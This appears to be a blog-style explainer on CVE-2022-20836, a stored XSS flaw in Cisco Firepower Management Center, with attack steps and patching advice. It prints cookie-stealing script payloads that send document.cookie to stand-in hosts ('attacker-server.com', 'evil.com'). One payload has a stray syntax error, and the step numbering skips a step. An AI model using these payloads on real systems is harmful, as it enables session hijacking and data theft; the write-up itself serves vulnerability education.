CVE-2022-20836 - Unpacking Stored XSS Vulnerabilities in Cisco Firepower Management Center (FMC) Software

In 2022, Cisco patched several serious security issues in its Firepower Management Center (FMC) software—these could let a remote, authenticated attacker run malicious JavaScript on other users’ browsers through the web interface. Assigned as CVE-2022-20836, these are stored cross-site scripting (XSS) vulnerabilities that could also impact the dashboard’s availability. Let’s break down what happened, how an attack works, and see code snippets of a possible exploit.

What is Stored XSS?

Stored XSS means user-supplied input with embedded scripts is stored by the application (for example, in a database) and later displayed to other users in a way that the script is executed in their browser. This is dangerous: it allows an attacker to hijack sessions, steal data, or even gain further network access, all from injecting a simple payload.

Where’s the Vulnerability?

According to Cisco’s official advisory, multiple pages and field entries in the FMC web-based interface lacked proper input validation and output encoding. When an attacker enters data in these forms—like in device names, interface descriptions, comment fields, or other text boxes—the scripts they inject are stored and later rendered/executed in any admin or user’s browser viewing the page.

Key points

- Attack requires authentication (must be a user with access, but doesn’t need to be a high-privilege account).

1. Attacker logs in

The attacker must have valid credentials (which may come from phishing, weak passwords, internal compromise, etc.).

A simple script (proof of concept) to steal cookies

<script>
  fetch("http://attacker-server.com/steal?cookie="; + document.cookie)
</script>

Or, to pop up a harmless alert for demo

<script>alert('XSS by CVE-2022-20836')</script>

3. Inserting the Script

The script is pasted into a field such as a device name, group description, or comment field within the web admin dashboard.

Example screenshot (hypothetical):  
_Firewall Device Name:_ [paste malicious script here]

4. Script is Stored

The FMC interface stores the field as normal, without stripping or encoding <script> tags, so the payload is saved in the backend.

5. Victim Views the Page

Another user—perhaps an admin—views the affected page. The stored data containing the script is rendered as HTML, not as escaped text:

<tr>
  <td>[malicious script is rendered here]</td>
</tr>

Result: The script runs in the victim’s browser in the context of their active, authenticated session.

Data Theft: Scripts can access session cookies, localStorage, or extract sensitive user details.

- Phishing: Attackers could inject forms or overlays in the dashboard, tricking users into giving up deeper credentials.
- Availability/Reboot: Some script payloads could overload parts of the dashboard, causing a temporary “crash” or downtime.
- Privilege Escalation: If an admin triggers the payload, an attacker might get escalated command or further access.

Here's a minimal demo showing how a stored XSS can happen in a vulnerable field

// Assume attacker is filling out a device description field
const maliciousInput = `<script>
  // Steal the current user's cookie
  fetch('https://evil.com/collect?cookie='+encodeURIComponent(document.cookie));
</script>`;

// Simulated server database entry
database.save(deviceDescription = maliciousInput);

// Later, when another user loads the device page:
document.getElementById('description').innerHTML = database.fetch(deviceDescription);
// This executes the script!

Mitigation and Patches

- Upgrade Immediately: Cisco released fixes for all affected versions. See Cisco’s official advisory or release notes for exact patch versions.
- Sanitize all input: Until patched, restrict who can enter data and never use unknown or shared accounts.

Additional References

- National Vulnerability Database: CVE-2022-20836
- Cisco Security Advisory
- OWASP XSS Explanation

Conclusion

CVE-2022-20836 isn’t just a theoretical risk—stored XSS in a security management platform like Cisco FMC puts entire networks at risk of takeover and downtime. Web admins should always update to patched releases, enforce least privilege, and test their web applications for unescaped user input. If your organization is running any version of Cisco FMC predating 2022’s patch, update immediately!

Timeline

Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/18/2022 18:14:00 UTC